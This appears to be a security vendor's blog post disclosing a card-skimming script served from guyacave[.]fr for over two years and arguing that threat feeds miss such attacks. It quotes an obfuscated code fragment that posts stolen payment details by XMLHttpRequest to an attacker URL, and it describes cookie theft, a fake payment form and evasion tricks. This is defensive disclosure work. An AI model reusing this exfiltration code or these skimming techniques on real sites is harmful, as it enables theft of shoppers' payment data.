Skip to main content
Blog
Blog Attacks

Threat feeds fail to detect attack for +2 years

On this website, we can see it's been active since August of 2022. We've notified this, and other websites of this attack.

Oct 02, 2024 4 min read
threat-feeds-image-cover

TL;DR: long-dwell skimmer detection

  • Feeds are not a defense: Threat feeds get called the front line, but the guyacave[.]fr skimmer sat live on multiple sites for more than two years while the feeds barely reacted, so calling that arrangement a defensive line is generous.
  • Runtime beats lists: Only 10 of 96 VirusTotal vendors flagged the domain, and cside's first-party JavaScript agent observes each third-party script's runtime behavior in the browser on every session rather than trusting a curated source list.
  • Bottom line: If your only defense is a subscription of known-bad domains, ask yourself how many years an unlisted skimming script could already have been running quietly on your checkout page without anyone noticing.

Short on time? See cside's AI-agent detection. It covers everything below in one deployment.

cside just detected a client-side attack that's been active for over 2 years. The domain guyacave[.]fr is serving a Personal Identifiable Information (PII) skimmer script on multiple websites since August of 2022. Check your website now, and remove the script with the domain immediately if found.

During analysis of malicious scripts we came across a website infected by one. On this website, we can see it's been active since August of 2022. We've notified this, and other websites of this attack.

In further research, we came across a post by Decoded Avast from November 2022 where the domain guyacave[.]fr was already mentioned as malicious.

They write:

Attackers also exploited other legitimate sites, such as sites selling clothes, shoes, jewellery, furniture and medical supplies, to host their skimming code. Specifically, they used guyacave[.]fr, servair[.]com and stripefaster[.]com. Attackers exfiltrated payment details via the POST request to URLs like guyacave[.]fr/js/tiny_mce/themes/modern/themes.php and similar for the other domains. In some cases, the POST request was sent to the infected e-commerce site itself, indicating that the attacker has full access to the compromised sites. We protected nearly 17,000 users globally from this webskimmer.

The inline URL: _0x800b[140];var _0xb61ex27= new XMLHttpRequest();_0xb61ex27[_0x800b[143]](_0x800b[141],_0x800b[142],true);_0xb61ex27[_0x800b[144]](_0xb61ex25) - inside the script indicates it uses an XML HTTP request to send the private payment details to an external endpoint. In this case, being https://guyacave[.]fr/js/tiny_mce/themes/modern/themes.php.

Wayback Machine archive of the malicious skimming script on guyacave[.]fr

The script has functions for reading and writing cookies. Likely used to steal session cookies and other sensitive information stored in the browser.

We also found the Math.random() function to create dynamic elements. This is what makes third-party scripts dangerous, and securing them essential. Any third-party script is inherently dynamic, and can change based on all kinds of parameters. This Math.random() function helps to evade simple signature-based detection methods.

cside's engine is more advanced, and was able to detect and block this malicious script in our tests.

Finally, the script manipulates the website's UI to hide certain elements. This through the simple display:none function, to present the fake payment form instead of the real one.

Threat feeds are the main way businesses inform themselves on malicious domains linked on their website. At cside, we don't believe this is the best solution for client-side security.

The 1st reason threat feeds don't work

To date, only 10 out of 96 security vendors on VirusTotal flagged this domain as malicious. Threat feeds have their purpose, but are insufficient in client-side security. This attack shows that even after 2 years, most feeds have not caught up. At best, they catch and alert after the fact. At worst, it goes undetected for years.

Threat feed screenshot showing the malicious domain still largely undetected after two years

Prevention is the next step

Even if the domain was flagged earlier and by more feeds, attackers could simply search for a new domain that suits their needs.

Threat feeds rely on checking the source, in this case the domain, not the payload of the code. This makes detection practically impossible until someone manually flags it. This makes threat feeds a reactionary solution, not a preventative one.

In our tests, cside was able to detect and block this malicious script and domain. Had these websites, or the platforms they were built on, have cside in place, this attack would've been noticed and stopped immediately.

On each session, we load third-party scripts in a secure proxy which checks the actual payload of the script, not just the sources and domains. If we detect anything suspicious, our customers are alerted and the script is blocked from loading in the browser of the website visitor.

You can sign up for cside and protect your site in minutes.

Simon Wijckmans
Founder & CEO

Founder and CEO of cside. Previously a product manager on Cloudflare Page Shield (now Cloudflare Client-Side Security). Co-chair of the W3C Anti-Fraud Community Group and a Forbes 30 Under 30 honoree. Building accessible security against client-side attacks, web security is not an enterprise-only problem.

Monitor and Secure Your Third-Party Scripts

Gain full visibility and control over every script delivered to your users to enhance site security and performance.

Start free, or try Business with a 14-day trial.

cside dashboard interface showing script monitoring and security analytics
Related Articles
Book a demo

Want to walk through this with an engineer?

Thirty minutes, on your own site. Not a slide deck.

We'll show you:

Which third-party scripts are running on your site right now
Where you stand on PCI DSS 6.4.3 and 11.6.1
How much of your traffic is bots and AI agents

Rather just send a question?

Finding open slots…

Real humans only. We'd know.

Having trouble booking? Open scheduler in a new tab

What are you trying to solve?

Tell us in a line and we'll come back with something useful, not a generic pitch.

We usually help with:

Seeing which third-party scripts run on your site
PCI DSS 6.4.3 and 11.6.1 evidence
Bots, AI agents and account takeover

Prefer to just book a time? Pick a slot instead